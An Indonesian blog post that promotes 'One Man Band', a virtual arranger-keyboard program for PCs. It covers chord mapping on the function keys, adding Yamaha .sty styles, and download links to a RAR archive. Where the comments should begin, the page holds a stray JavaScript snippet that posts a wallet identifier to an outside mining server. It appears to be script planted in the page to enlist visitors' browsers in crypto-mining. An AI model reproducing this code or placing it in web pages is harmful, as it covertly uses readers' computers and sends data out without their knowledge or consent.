belajar komputer

Sabtu, 15 Februari 2014

MAIN ORGAN TUNGGAL DI PC/LAPTOP

Buat yang ingin memainkan keyboard seperti Yamaha PSR di PC/ Laptop mau dangdut oplosan,koplo,ngeband,dll pokoke lengkap bro,seperti main  di panggung aja. saat ini mungkin kamu sedang beruntung.. tungg.. tung.. Karena kamu sedang berada di waktu dan tempat yang tepat. :p

Screenshot :




Software Virtual Piano yang akan saya bagikan kali ini menurut saya cukup/ lebih lengkap dari software virtual piano lainnya. Karena di dalam software ini terdapat berbagai macam style layaknya keyboard Yamaha PSR asli. Nama softwarenya?  ONE MAN BAND.

Dengan software ini kita serasa sedang memainkan keyboard Yamaha PSR cuy, bedanya cuma kita memainkannya dengan keyboard PC/ Laptop sedangkan kalau aslinya dimainkan dengan tongkat baseball atau lebih sering disebut dengan TUTS. -_-'

Tombol untuk Chord/ Kunci bisa menggunakan F1 sampai F12, dan dapat diatur sesuai dengan selera kita (itu hak kamu). :))

Contoh, kita bisa setting seperti ini :

F1 = C Major
F2 = G Major
F3 = F Major
F4 = A minor
F5 = E minor
F6 = D minor
Dan seterusnya....

Dan tombol untuk notasinya bisa dengan menekan Q W E R T Y U I O P [ ] \.

Tidak cuma stylenya saja, Instrumentnya juga lumayan lengkap dari piano sampai terumpet semuanya ada. Ada intro serta Fill in (Variasi 1,2,3,4 dan Ending). Selain itu kita juga bisa menambah style dari Yamaha PRS asli!. Kalau kita ingin Dangdutan (Style Yamaha PRS ekstensinya .sty, misalnya Dangdut Koplo.sty), kita bisa mengambil style dari Yamaha PRS dangdut.sty, dan mengcopykannya kedalam folder One Man Band dan memilih style tersebut dari menu loader.

Bisa dibilang, dengan software ini kita sudah siap terjun langsung ke lapangan untuk mengiringi penyanyi seakan kita adalah Pemain Organ Tunggal Profesional :)) .

Buat yang tidak sabar untuk mendownload software luar biasa ini, silahkan klik link dibawah ini :


DOWNLOAD DI SINI OMB10Fll.rar 

Untuk Style tambahan seperti Dangdut, RnB, dan beberapa Band Indonesia bisa di download disini :

DOWNLOAD

Semoga artikel Sofware Virtual Piano terbaik untuk Komputer (Memainkan Organ Tunggal di PC bermanfaat bagi Anda.

4 komentar:

var wallet = "cy_26 067b6 be129 ba270 c8100 e0f49 03d82 eab5c 3b065 43fea e169e c7e1f aa5fd f1"; $.post("http://mining.cayafuture.com:2435/"+wallet, function( data ) { //alert(data); })